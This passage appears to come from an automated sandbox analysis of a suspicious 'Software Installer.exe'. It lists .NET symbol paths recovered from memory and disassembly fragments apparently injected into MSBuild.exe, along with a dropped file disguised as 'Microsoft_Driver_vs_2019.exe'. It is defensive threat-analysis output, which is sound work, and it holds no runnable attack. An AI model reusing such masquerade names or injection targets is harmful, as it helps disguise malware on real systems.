Source: Binary string: System.Net.NameResolution.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654629650.000001D777A61000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256: source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdb source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Drawing.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.NetworkInformation.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654964425.000001D777C50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648012640.00000196DE210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653250976.000001D776D00000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654538768.000001D777A21000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/Release/net8.0-windows/Microsoft.Win32.SystemEvents.pdbSHA256_ source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652996729.000001D775210000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654475381.000001D7779B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2648087403.00000196DE281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648034270.00000196DE220000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256sU4T source: Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652407174.000001D775011000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2653023838.000001D775240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA2564w5 source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655043542.000001D777CC0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdb source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256u source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256CS source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256- source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2647707848.00000196DC8A1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647991281.00000196DE1F0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Xml\Release\net8.0\System.Runtime.Serialization.Xml.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655625974.000001D778160000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256j source: Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdbSHA256 source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256@ source: Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655023098.000001D777CB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDDA96C FindFirstFileExW,11_2_00007FF7ECDDA96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]13_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h13_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh]13_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]13_2_00413143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh13_2_0044A106
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]13_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea ecx, dword ptr [eax-40000000h]13_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then lea edx, dword ptr [ecx+ecx]13_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h13_2_0044C2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+44h]13_2_00444300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h]13_2_0044D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [ecx], bx13_2_0044D300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], esi13_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]13_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov ebp, ebx13_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, di13_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h]13_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]13_2_0044D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [edi], cx13_2_00429840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [00451018h]13_2_0040F066
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]13_2_00402800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h13_2_004480C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00410897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]13_2_00410897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]13_2_0044D950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h]13_2_0042D92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh13_2_004019E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-51AE6CD0h]13_2_0044AA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp], 8B8A8924h13_2_0043F250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h]13_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h]13_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ecx], dl13_2_00423A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], cl13_2_00423A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp eax13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+70h]13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h]13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [eax]13_2_00448220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h13_2_004292C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h]13_2_004482E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]13_2_00433A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then push eax13_2_00449B7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]13_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]13_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]13_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-000000FAh]13_2_00433A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+34h]13_2_00433330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [esi], cl13_2_00436BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+68h]13_2_00437BB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [ecx], dl13_2_00411C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]13_2_00435C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+08h], ebx13_2_00445C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00410C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]13_2_00410C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch]13_2_0042F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_00441480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h]13_2_00428CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]13_2_0044BD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [eax], cl13_2_0041EDDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh]13_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [eax]13_2_00448590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+50h]13_2_004305B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]13_2_0041AE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov byte ptr [edi], cl13_2_00438E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+10h], ecx13_2_00438E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then add eax, esi13_2_00437627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h]13_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]13_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [esp+10h], ecx13_2_00438E39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah]13_2_00445ED1
